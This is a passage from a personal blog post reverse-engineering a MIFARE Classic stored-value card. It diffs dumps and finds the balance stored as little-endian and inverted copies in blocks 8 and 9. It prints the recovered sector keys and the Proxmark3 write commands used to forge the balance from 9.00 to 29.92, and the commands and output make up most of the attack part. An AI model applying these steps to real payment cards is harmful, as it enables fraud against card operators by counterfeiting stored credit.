      data02: <span class="nv">RAW</span><span class="o">=</span>1D FB | <span class="nv">INT_LE</span><span class="o">=</span>     64285 | <span class="nv">INT_BE</span><span class="o">=</span>      7675 | <span class="nv">NOT_LE</span><span class="o">=</span>      1250 | <span class="nv">NOT_BE</span><span class="o">=</span>     57860 | <span class="nv">BIN</span><span class="o">=</span>1111101100011101 | <span class="nv">BIN_NOT</span><span class="o">=</span>0000010011100010 | <span class="nv">NOT_RAW</span><span class="o">=</span>E2 04
    <span class="o">!</span>+08
      data01: <span class="nv">RAW</span><span class="o">=</span>84 03 | <span class="nv">INT_LE</span><span class="o">=</span>       900 | <span class="nv">INT_BE</span><span class="o">=</span>     33795 | <span class="nv">NOT_LE</span><span class="o">=</span>     64635 | <span class="nv">NOT_BE</span><span class="o">=</span>     31740 | <span class="nv">BIN</span><span class="o">=</span>0000001110000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111110001111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>7B FC
      data02: <span class="nv">RAW</span><span class="o">=</span>E2 04 | <span class="nv">INT_LE</span><span class="o">=</span>      1250 | <span class="nv">INT_BE</span><span class="o">=</span>     57860 | <span class="nv">NOT_LE</span><span class="o">=</span>     64285 | <span class="nv">NOT_BE</span><span class="o">=</span>      7675 | <span class="nv">BIN</span><span class="o">=</span>0000010011100010 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111101100011101 | <span class="nv">NOT_RAW</span><span class="o">=</span>1D FB

<span class="o">[</span>BLOCK] <span class="nv">ID</span><span class="o">=</span>9 <span class="nv">S</span><span class="o">=</span>2 <span class="nv">B</span><span class="o">=</span>1
  <span class="o">[</span><span class="nv">units</span><span class="o">=</span>2]
    data01: <span class="nv">FULL</span><span class="o">=[</span>84 03] | 00 00 | <span class="o">[</span>7B FC] | FF FF | <span class="o">[</span>84 03] | 00 00 | 09 F6 | 09 F6
    data02: <span class="nv">FULL</span><span class="o">=[</span>E2 04] | 00 00 | <span class="o">[</span>1D FB] | FF FF | <span class="o">[</span>E2 04] | 00 00 | 09 F6 | 09 F6
    <span class="o">!</span>+00
      data01: <span class="nv">RAW</span><span class="o">=</span>84 03 | <span class="nv">INT_LE</span><span class="o">=</span>       900 | <span class="nv">INT_BE</span><span class="o">=</span>     33795 | <span class="nv">NOT_LE</span><span class="o">=</span>     64635 | <span class="nv">NOT_BE</span><span class="o">=</span>     31740 | <span class="nv">BIN</span><span class="o">=</span>0000001110000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111110001111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>7B FC
      data02: <span class="nv">RAW</span><span class="o">=</span>E2 04 | <span class="nv">INT_LE</span><span class="o">=</span>      1250 | <span class="nv">INT_BE</span><span class="o">=</span>     57860 | <span class="nv">NOT_LE</span><span class="o">=</span>     64285 | <span class="nv">NOT_BE</span><span class="o">=</span>      7675 | <span class="nv">BIN</span><span class="o">=</span>0000010011100010 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111101100011101 | <span class="nv">NOT_RAW</span><span class="o">=</span>1D FB
    <span class="o">!</span>+04
      data01: <span class="nv">RAW</span><span class="o">=</span>7B FC | <span class="nv">INT_LE</span><span class="o">=</span>     64635 | <span class="nv">INT_BE</span><span class="o">=</span>     31740 | <span class="nv">NOT_LE</span><span class="o">=</span>       900 | <span class="nv">NOT_BE</span><span class="o">=</span>     33795 | <span class="nv">BIN</span><span class="o">=</span>1111110001111011 | <span class="nv">BIN_NOT</span><span class="o">=</span>0000001110000100 | <span class="nv">NOT_RAW</span><span class="o">=</span>84 03
      data02: <span class="nv">RAW</span><span class="o">=</span>1D FB | <span class="nv">INT_LE</span><span class="o">=</span>     64285 | <span class="nv">INT_BE</span><span class="o">=</span>      7675 | <span class="nv">NOT_LE</span><span class="o">=</span>      1250 | <span class="nv">NOT_BE</span><span class="o">=</span>     57860 | <span class="nv">BIN</span><span class="o">=</span>1111101100011101 | <span class="nv">BIN_NOT</span><span class="o">=</span>0000010011100010 | <span class="nv">NOT_RAW</span><span class="o">=</span>E2 04
    <span class="o">!</span>+08
      data01: <span class="nv">RAW</span><span class="o">=</span>84 03 | <span class="nv">INT_LE</span><span class="o">=</span>       900 | <span class="nv">INT_BE</span><span class="o">=</span>     33795 | <span class="nv">NOT_LE</span><span class="o">=</span>     64635 | <span class="nv">NOT_BE</span><span class="o">=</span>     31740 | <span class="nv">BIN</span><span class="o">=</span>0000001110000100 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111110001111011 | <span class="nv">NOT_RAW</span><span class="o">=</span>7B FC
      data02: <span class="nv">RAW</span><span class="o">=</span>E2 04 | <span class="nv">INT_LE</span><span class="o">=</span>      1250 | <span class="nv">INT_BE</span><span class="o">=</span>     57860 | <span class="nv">NOT_LE</span><span class="o">=</span>     64285 | <span class="nv">NOT_BE</span><span class="o">=</span>      7675 | <span class="nv">BIN</span><span class="o">=</span>0000010011100010 | <span class="nv">BIN_NOT</span><span class="o">=</span>1111101100011101 | <span class="nv">NOT_RAW</span><span class="o">=</span>1D FB
</code></pre></div></div>

<p>Much cleaner. Each diff-ed unit is also visualised in different encoding (heavily based on <a href="https://imhex.werwolv.net/" rel="external nofollow noopener" target="_blank">ImHex</a>) such as integer little/big-endian, bits, raw bytes and also their respective not-ed representation.</p>

<p>This is where knowing the visible credit value makes the whole thing much easier (almost <a href="https://trivialityspace.github.io/" rel="external nofollow noopener" target="_blank">trivial</a>). In blocks <code class="language-plaintext highlighter-rouge">8</code> and <code class="language-plaintext highlighter-rouge">9</code>, the little-endian interpretation of the changed bytes directly matches the two balances: <code class="language-plaintext highlighter-rouge">9.00</code> and <code class="language-plaintext highlighter-rouge">12.50</code>.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dump  ID*  sector  sector-block  offset  RAW    INT_LE  NOT_LE
----  ---  ------  ------------  ------  -----  ------  ------
0900  8    2       0             +00     84 03  &lt;900&gt;   64635
1250  8    2       0             +00     E2 04  &lt;1250&gt;  64285
0900  8    2       0             +04     7B FC  64635   &lt;900&gt;
1250  8    2       0             +04     1D FB  64285   &lt;1250&gt;
0900  8    2       0             +08     84 03  &lt;900&gt;   64635
1250  8    2       0             +08     E2 04  &lt;1250&gt;  64285
0900  9    2       1             +00     84 03  &lt;900&gt;   64635
1250  9    2       1             +00     E2 04  &lt;1250&gt;  64285
0900  9    2       1             +04     7B FC  64635   &lt;900&gt;
1250  9    2       1             +04     1D FB  64285   &lt;1250&gt;
0900  9    2       1             +08     84 03  &lt;900&gt;   64635
1250  9    2       1             +08     E2 04  &lt;1250&gt;  64285
</code></pre></div></div>

<p>*<code class="language-plaintext highlighter-rouge">ID</code> is the global block number.</p>

<p>So it seems the credit value is written a few times, both as little-endian and as its bitwise-not counterpart. That kind of duplication is common in simple stored-value formats: one copy for the value, one inverted copy as a cheap consistency check, and sometimes another repeated copy for redundancy.</p>

<p>Block <code class="language-plaintext highlighter-rouge">6</code> also changes, but I am not sure what it represents. It is probably a timestamp, transaction counter, or some other metadata. To keep the experiment focused, I left block <code class="language-plaintext highlighter-rouge">6</code> alone and only changed the bytes in blocks <code class="language-plaintext highlighter-rouge">8</code> and <code class="language-plaintext highlighter-rouge">9</code> that clearly tracked the balance.</p>

<p>For the test value I used <code class="language-plaintext highlighter-rouge">B0 0B</code>, for mature and scientific reasons. Conveniently, it also maps to a <code class="language-plaintext highlighter-rouge">29.92</code> credit value when interpreted as a little-endian integer:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;</span> ssdp conv b00b 2 <span class="nt">--from</span> RAW
BIN    : 1011000000001011
BIN_NOT: 0100111111110100
INT_BE : 45067
INT_LE : 2992
NOT_BE : 20468
NOT_LE : 62543
NOT_RAW: 4F F4
RAW    : B0 0B
</code></pre></div></div>

<p>Before writing anything, I wanted to read the target blocks back directly and keep the relevant sector keys in front of me. From the <code class="language-plaintext highlighter-rouge">autopwn</code> output, sector <code class="language-plaintext highlighter-rouge">2</code> uses trailer block <code class="language-plaintext highlighter-rouge">11</code>, with this key pair:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>+] <span class="nt">-----</span>+-----+--------------+---+--------------+----
<span class="o">[</span>+]  Sec | Blk | key A        |res| key B        |res
<span class="o">[</span>+] <span class="nt">-----</span>+-----+--------------+---+--------------+----
<span class="o">[</span>+]  000 | 003 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  001 | 007 | A71A0C3102FD | N | B76198135BD9 | N
<span class="o">[</span>+]  002 | 011 | A49F68AB4733 | N | B4E109EC9C52 | N
<span class="o">[</span>+]  003 | 015 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  004 | 019 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  005 | 023 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  006 | 027 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  007 | 031 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  008 | 035 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  009 | 039 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  010 | 043 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  011 | 047 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  012 | 051 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  013 | 055 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  014 | 059 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+]  015 | 063 | FFFFFFFFFFFF | D | FFFFFFFFFFFF | D
<span class="o">[</span>+] <span class="nt">-----</span>+-----+--------------+---+--------------+----
<span class="o">[=]</span> <span class="o">(</span> D:Dictionary / S:darkSide / U:User / R:Reused / N:Nested / H:Hardnested / C:statiCnested / A:keyA  <span class="o">)</span>
</code></pre></div></div>

<p>Using key A for sector <code class="language-plaintext highlighter-rouge">2</code>, I can read blocks <code class="language-plaintext highlighter-rouge">8</code> and <code class="language-plaintext highlighter-rouge">9</code> directly and verify that they still contain the <code class="language-plaintext highlighter-rouge">9.00</code> balance representation:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>usb] pm3 <span class="nt">--</span><span class="o">&gt;</span> hf mf rdbl <span class="nt">--blk</span> 8 <span class="nt">-k</span> A49F68AB4733

<span class="o">[=]</span>   <span class="c"># | sector 02 / 0x02                                | ascii</span>
<span class="o">[=]</span> <span class="nt">----</span>+-------------------------------------------------+-----------------
<span class="o">[=]</span>   8 | 84 03 00 00 7B FC FF FF 84 03 00 00 09 F6 09 F6 | ....<span class="o">{</span>........

<span class="o">[</span>usb] pm3 <span class="nt">--</span><span class="o">&gt;</span> hf mf rdbl <span class="nt">--blk</span> 9 <span class="nt">-k</span> A49F68AB4733

<span class="o">[=]</span>   <span class="c"># | sector 02 / 0x02                                | ascii</span>
<span class="o">[=]</span> <span class="nt">----</span>+-------------------------------------------------+-----------------
<span class="o">[=]</span>   9 | 84 03 00 00 7B FC FF FF 84 03 00 00 09 F6 09 F6 | ....<span class="o">{</span>........
</code></pre></div></div>

<p>The new block value is just the old block with <code class="language-plaintext highlighter-rouge">84 03</code> (<code class="language-plaintext highlighter-rouge">0900</code>) replaced by <code class="language-plaintext highlighter-rouge">B0 0B</code> (<code class="language-plaintext highlighter-rouge">29.92</code>) and <code class="language-plaintext highlighter-rouge">7B FC</code> replaced by <code class="language-plaintext highlighter-rouge">4F F4</code>, the inverted representation:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;&gt;&gt;</span> <span class="n">block</span> <span class="o">=</span> <span class="sh">"</span><span class="s">84 03 00 00 7B FC FF FF 84 03 00 00 09 F6 09 F6</span><span class="sh">"</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">data</span> <span class="o">=</span> <span class="n">block</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sh">"</span><span class="s"> </span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sh">"</span><span class="s">8403</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">B00B</span><span class="sh">"</span><span class="p">)</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="sh">"</span><span class="s">7BFC</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">4FF4</span><span class="sh">"</span><span class="p">)</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">data</span>
<span class="sh">'</span><span class="s">B00B00004FF4FFFFB00B000009F609F6</span><span class="sh">'</span>
</code></pre></div></div>

<p>For this sector, key B is accepted for the write. I wrote the same updated value to both blocks that appeared to hold the balance:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">[</span>usb] pm3 <span class="nt">--</span><span class="o">&gt;</span> hf mf wrbl <span class="nt">--blk</span> 8 <span class="nt">-k</span> B4E109EC9C52 <span class="nt">-b</span> <span class="nt">-d</span> B00B00004FF4FFFFB00B000009F609F6
<span class="o">[=]</span> Writing block no 8, key <span class="nb">type</span>:B - B4E109EC9C52
<span class="o">[=]</span> data: B0 0B 00 00 4F F4 FF FF B0 0B 00 00 09 F6 09 F6
<span class="o">[</span>+] Write <span class="o">(</span> ok <span class="o">)</span>
<span class="o">[</span>?] Hint: Try <span class="sb">`</span>hf mf rdbl<span class="sb">`</span> to verify

<span class="o">[</span>usb] pm3 <span class="nt">--</span><span class="o">&gt;</span> hf mf wrbl <span class="nt">--blk</span> 9 <span class="nt">-k</span> B4E109EC9C52 <span class="nt">-b</span> <span class="nt">-d</span> B00B00004FF4FFFFB00B000009F609F6
<span class="o">[=]</span> Writing block no 9, key <span class="nb">type</span>:B - B4E109EC9C52
<span class="o">[=]</span> data: B0 0B 00 00 4F F4 FF FF B0 0B 00 00 09 F6 09 F6
<span class="o">[</span>+] Write <span class="o">(</span> ok <span class="o">)</span>
<span class="o">[</span>?] Hint: Try <span class="sb">`</span>hf mf rdbl<span class="sb">`</span> to verifyh
</code></pre></div></div>

<p>After writing, I dumped the card again and compared the modified dump against the previous <code class="language-plaintext highlighter-rouge">9.00</code> dump. The only intended differences should be in blocks <code class="language-plaintext highlighter-rouge">8</code> and <code class="language-plaintext highlighter-rouge">9</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt; ssdp diff --units 2 --format mf1k hf-mf-6C2FAC83-dump-xxxx.bin hf-mf-6C2FAC83-dump-0900.bin
Inputs:
  data01: hf-mf-6C2FAC83-dump-xxxx.bin
  data02: hf-mf-6C2FAC83-dump-0900.bin

Diff blocks:
  [BLOCK] ID=8 S=2 B=0
  [BLOCK] ID=9 S=2 B=1

[BLOCK] ID=8 S=2 B=0
  [units=2]
    data01: FULL=[B0 0B] | 00 00 | [4F F4] | FF FF | [B0 0B] | 00 00 | 09 F6 | 09 F6
    data02: FULL=[84 03] | 00 00 | [7B FC] | FF FF | [84 03] | 00 00 | 09 F6 | 09 F6
    !+00
      data01: RAW=B0 0B | INT_LE=      2992 | INT_BE=     45067 | NOT_LE=     62543 | NOT_BE=     20468 | BIN=0000101110110000 | BIN_NOT=1111010001001111 | NOT_RAW=4F F4
      data02: RAW=84 03 | INT_LE=       900 | INT_BE=     33795 | NOT_LE=     64635 | NOT_BE=     31740 | BIN=0000001110000100 | BIN_NOT=1111110001111011 | NOT_RAW=7B FC
    !+04
      data01: RAW=4F F4 | INT_LE=     62543 | INT_BE=     20468 | NOT_LE=      2992 | NOT_BE=     45067 | BIN=1111010001001111 | BIN_NOT=0000101110110000 | NOT_RAW=B0 0B
      data02: RAW=7B FC | INT_LE=     64635 | INT_BE=     31740 | NOT_LE=       900 | NOT_BE=     33795 | BIN=1111110001111011 | BIN_NOT=0000001110000100 | NOT_RAW=84 03
    !+08
      data01: RAW=B0 0B | INT_LE=      2992 | INT_BE=     45067 | NOT_LE=     62543 | NOT_BE=     20468 | BIN=0000101110110000 | BIN_NOT=1111010001001111 | NOT_RAW=4F F4
      data02: RAW=84 03 | INT_LE=       900 | INT_BE=     33795 | NOT_LE=     64635 | NOT_BE=     31740 | BIN=0000001110000100 | BIN_NOT=1111110001111011 | NOT_RAW=7B FC

[BLOCK] ID=9 S=2 B=1
  [units=2]
    data01: FULL=[B0 0B] | 00 00 | [4F F4] | FF FF | [B0 0B] | 00 00 | 09 F6 | 09 F6
    data02: FULL=[84 03] | 00 00 | [7B FC] | FF FF | [84 03] | 00 00 | 09 F6 | 09 F6
    !+00
      data01: RAW=B0 0B | INT_LE=      2992 | INT_BE=     45067 | NOT_LE=     62543 | NOT_BE=     20468 | BIN=0000101110110000 | BIN_NOT=1111010001001111 | NOT_RAW=4F F4
      data02: RAW=84 03 | INT_LE=       900 | INT_BE=     33795 | NOT_LE=     64635 | NOT_BE=     31740 | BIN=0000001110000100 | BIN_NOT=1111110001111011 | NOT_RAW=7B FC
    !+04
      data01: RAW=4F F4 | INT_LE=     62543 | INT_BE=     20468 | NOT_LE=      2992 | NOT_BE=     45067 | BIN=1111010001001111 | BIN_NOT=0000101110110000 | NOT_RAW=B0 0B
      data02: RAW=7B FC | INT_LE=     64635 | INT_BE=     31740 | NOT_LE=       900 | NOT_BE=     33795 | BIN=1111110001111011 | BIN_NOT=0000001110000100 | NOT_RAW=84 03
    !+08
      data01: RAW=B0 0B | INT_LE=      2992 | INT_BE=     45067 | NOT_LE=     62543 | NOT_BE=     20468 | BIN=0000101110110000 | BIN_NOT=1111010001001111 | NOT_RAW=4F F4
      data02: RAW=84 03 | INT_LE=       900 | INT_BE=     33795 | NOT_LE=     64635 | NOT_BE=     31740 | BIN=0000001110000100 | BIN_NOT=1111110001111011 | NOT_RAW=7B FC
</code></pre></div></div>

<figure>

  <picture>
    
    <source class="responsive-img-srcset" media="(max-width: 480px)" srcset="/assets/img/blog/2025-10-12/2992-480.webp"></source>
    <source class="responsive-img-srcset" media="(max-width: 800px)" srcset="/assets/img/blog/2025-10-12/2992-800.webp"></source>
    <source class="responsive-img-srcset" media="(max-width: 1400px)" srcset="/assets/img/blog/2025-10-12/2992-1400.webp"></source>
    

    <!-- Fallback to the original file -->
    <img src="/assets/img/blog/2025-10-12/2992.png" class="img-fluid centered" width="auto" height="auto" data-zoomable="" onerror="this.onerror=null; $('.responsive-img-srcset').remove();">

  </picture><figcaption class="caption">Credit value after editing bytes in blocks 8 and 9: 29.92</figcaption>

</figure>

<h2 id="conclusion">Conclusion</h2>

<p>That was enough to confirm the basic layout: the visible balance is stored in blocks <code class="language-plaintext highlighter-rouge">8</code> and <code class="language-plaintext highlighter-rouge">9</code>, repeated as a little-endian value and as its inverted counterpart. The other changed block is still suspicious, but it was not needed to make this specific value update work.</p>

<p>The fun part is how little magic there was once the dumps were side by side. Most of the work was not “breaking” anything, but getting the data into a shape where the pattern could be seen.</p>

  </article>



  
    
    <br>
    <hr>
    <br>
    <ul class="list-disc pl-8"></ul>

    <!-- Adds related posts to the end of an article -->
    <!-- h2 class="text-3xl font-semibold mb-4 mt-12">Enjoy Reading This Article?</h2 -->
    <p class="mb-2">Here are some more articles you might like to read next:</p>
  

  <li class="my-2">
    <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2023/04/nvim-evil-regex/">How I Made Neovim 300x Faster</a>
  </li>

  

  <li class="my-2">
    <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2020/11/ssh-local-forwarding/">SSH Local Forwarding</a>
  </li>

  

  <li class="my-2">
    <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2019/09/web-crawler/">Designing an efficient webcrawler</a>
  </li>

  

  <li class="my-2">
    <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2019/06/limit-mem-usage/">Limit process memory usage on Linux</a>
  </li>

  

  <li class="my-2">
    <a class="text-pink-700 underline font-semibold hover:text-pink-800" href="/blog/2019/01/FastBFT/">Scalable Byzantine Consensus via Hardware-assisted Secrete Sharing</a>
  </li>

</div>

    </div>

    <!-- Footer -->    <footer class="sticky-bottom mt-5">
      <div class="container">
        © Copyright 2026 fedemengo  . Last updated: June 25, 2026.
      </div>
    </footer>

    <!-- JavaScripts -->
    <!-- jQuery -->
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>

    <!-- Bootsrap & MDB scripts -->
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js" integrity="sha256-fgLAgv7fyCGopR/gBNq2iW3ZKIdqIcyshnUULC4vex8=" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/mdbootstrap@4.20.0/js/mdb.min.js" integrity="sha256-NdbiivsvWt7VYCt6hYNT3h/th9vSTL4EDWeGs5SN3DA=" crossorigin="anonymous"></script>

    <!-- Masonry & imagesLoaded -->
  <script defer src="https://cdn.jsdelivr.net/npm/masonry-layout@4.2.2/dist/masonry.pkgd.min.js" integrity="sha256-Nn1q/fx0H7SNLZMQ5Hw5JLaTRZp0yILA/FRexe19VdI=" crossorigin="anonymous"></script>
  <script defer src="https://cdn.jsdelivr.net/npm/imagesloaded@4/imagesloaded.pkgd.min.js"></script>
  <script defer src="/assets/js/masonry.js" type="text/javascript"></script>
    
  <!-- Medium Zoom JS -->
  <script defer src="https://cdn.jsdelivr.net/npm/medium-zoom@1.0.8/dist/medium-zoom.min.js" integrity="sha256-7PhEpEWEW0XXQ0k6kQrPKwuoIomz8R8IYyuU1Qew4P8=" crossorigin="anonymous"></script>
  <script defer src="/assets/js/zoom.js"></script><!-- Load Common JS -->
  <script defer src="/assets/js/common.js"></script>
  <script defer src="/assets/js/copy_code.js" type="text/javascript"></script>

    
  <script async src="https://d1bxh8uas1mnw7.cloudfront.net/assets/embed.js"></script>
  <script async src="https://badge.dimensions.ai/badge.js"></script>

    <!-- MathJax -->
  <script type="text/javascript">
    window.MathJax = {
      tex: {
        tags: 'ams'
      }
    };
  </script>
  <script defer type="text/javascript" id="MathJax-script" src="https://cdn.jsdelivr.net/npm/mathjax@3.2.0/es5/tex-mml-chtml.js"></script>
  <script defer src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>

    
    

<!-- Scrolling Progress Bar -->
<script type="text/javascript">
  /*
   * This JavaScript code has been adapted from the article 
   * https://css-tricks.com/reading-position-indicator/ authored by Pankaj Parashar, 
   * published on the website https://css-tricks.com on the 7th of May, 2014.
   * Couple of changes were made to the original code to make it compatible 
   * with the `al-foio` theme.
   */
  const progressBar = $("#progress");
  /*
   * We set up the bar after all elements are done loading.
   * In some cases, if the images in the page are larger than the intended
   * size they'll have on the page, they'll be resized via CSS to accomodate
   * the desired size. This mistake, however, breaks the computations as the
   * scroll size is computed as soon as the elements finish loading.
   * To account for this, a minimal delay was introduced before computing the
   * values.
   */
  window.onload = function () {
    setTimeout(progressBarSetup, 50);
  };
  /*
   * We set up the bar according to the browser.
   * If the browser supports the progress element we use that.
   * Otherwise, we resize the bar thru CSS styling
   */
  function progressBarSetup() {
    if ("max" in document.createElement("progress")) {
      initializeProgressElement();
      $(document).on("scroll", function() {
        progressBar.attr({ value: getCurrentScrollPosition() });
      });
      $(window).on("resize", initializeProgressElement);
    } else {
      resizeProgressBar();
      $(document).on("scroll", resizeProgressBar);
      $(window).on("resize", resizeProgressBar);
    }
  }
  /*
   * The vertical scroll position is the same as the number of pixels that
   * are hidden from view above the scrollable area. Thus, a value > 0 is
   * how much the user has scrolled from the top
   */
  function getCurrentScrollPosition() {
    return $(window).scrollTop();
  }

  function initializeProgressElement() {
    let navbarHeight = $("#navbar").outerHeight(true);
    $("body").css({ "padding-top": navbarHeight });
    $("progress-container").css({ "padding-top": navbarHeight });
    progressBar.css({ top: navbarHeight });
    progressBar.attr({
      max: getDistanceToScroll(),
      value: getCurrentScrollPosition(),
    });
  }
  /*
   * The offset between the html document height and the browser viewport
   * height will be greater than zero if vertical scroll is possible.
   * This is the distance the user can scroll
   */
  function getDistanceToScroll() {
    return $(document).height() - $(window).height();
  }

  function resizeProgressBar() {
    progressBar.css({ width: getWidthPercentage() + "%" });
  }
  // The scroll ratio equals the percentage to resize the bar
  function getWidthPercentage() {
    return (getCurrentScrollPosition() / getDistanceToScroll()) * 100;
  }
</script>

  </body>
</html>
